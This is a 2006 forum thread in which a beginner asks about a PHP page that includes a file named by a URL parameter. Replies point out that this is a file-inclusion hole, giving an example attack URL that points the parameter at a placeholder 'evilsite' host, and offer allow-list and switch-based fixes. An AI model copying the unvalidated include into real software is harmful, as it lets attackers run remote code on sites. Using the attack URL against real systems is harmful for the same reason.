PHP Page Problem

Webviper2006 · #1 01-23-2006, 07:50 PM

Hi I make this script...

<? if($id) { include("$id.php"); } else { include("home.php"); } ?>

On my index.php

Then I make a link like <a href="index.php?id=members">Members</a>

Why does it like refreshes the whole page? I want it to be on only one table. So I can keep the menu and the ads.

I think I should use iframe right?

JonM · #2 01-23-2006, 08:30 PM

iFrame? ewww lol

. Trust me, stick to refreshing the whole page. Now i'm confused though, why is it a problem for it to refresh? I may understand what you are talking about. I will post an example of how to make it work even w/ the annoying refresh.

Lakie · #3 01-24-2006, 03:11 AM

Quote:

<? if($id) { include("$id.php"); } else { include("home.php"); } ?>

I think thats a major security risk..

http://yoursite.com/index.php?id=http://www.evilsite.com/evil/evilcode.php

Need to chuck some checks in there to make sure its a legit file your including...

Capers · #4 01-24-2006, 06:25 AM

Quote:

Originally posted by Mike
I think thats a major security risk..

http://yoursite.com/index.php?id=htt...l/evilcode.php

Need to chuck some checks in there to make sure its a legit file your including...

Could do that by having an array of acceptable values for $id:

E.g.

PHP Code:


			
<?

$allowed_includes = array("page1","page2","page3");



if(isset($_GET[id])){



    //First check that the file is allowed to be included

    if(in_array($_GET[id],$allowed_includes)){



        //Check that file exists to be safe

        

        if(file_exists($_GET[id] . ".php")){



            include($_GET[id] . ".php");



        }else{



            echo "Page does not exist!";



        }



    }else{



        echo "Path not allowed!";



    }



}else{



    include("home.php");



}

?>

Anyones welcome to that code, but they better bug check it first cus i just wrote it and didnt bother checking.

Webviper2006 · #5 01-24-2006, 10:36 AM

So how can I use one? Last time I did not knew PHP and then I had to copy paste on every page I done! So?

Capers · #6 01-24-2006, 04:51 PM

Sorry, I'm finding it very hard to understand exactly what you are asking for many of your posts. Could you maybe be more clear?

Webviper2006 · #7 01-24-2006, 10:20 PM

Ok nevermind sorry.

BeBop · #8 02-01-2006, 08:45 PM

<?php
if($id == "members"){
include("members.html");
}elseif($id == "roster"){
include("roster.html");
}else{
include("home.html");
}
?>

or

<?php
switch($id){
case members;
include("members.html");
break;

case roster;
include("roster.php");
break;

default:
include("home.html");
break;
}
?>

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Uploader leaking PHP in page	brink	phphq.Net Forums	1	09-29-2008 07:21 PM
page.php?id=blablabla	NaughtyPerry	Web design and Programming	3	12-22-2005 06:05 PM
Problem logging in on home page.	HK	Tech Support	7	07-01-2004 12:39 PM
php problem	spinal	Web design and Programming	7	01-27-2004 12:27 AM
php-page	XenoMorpH	Web design and Programming	1	05-03-2003 04:34 AM

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)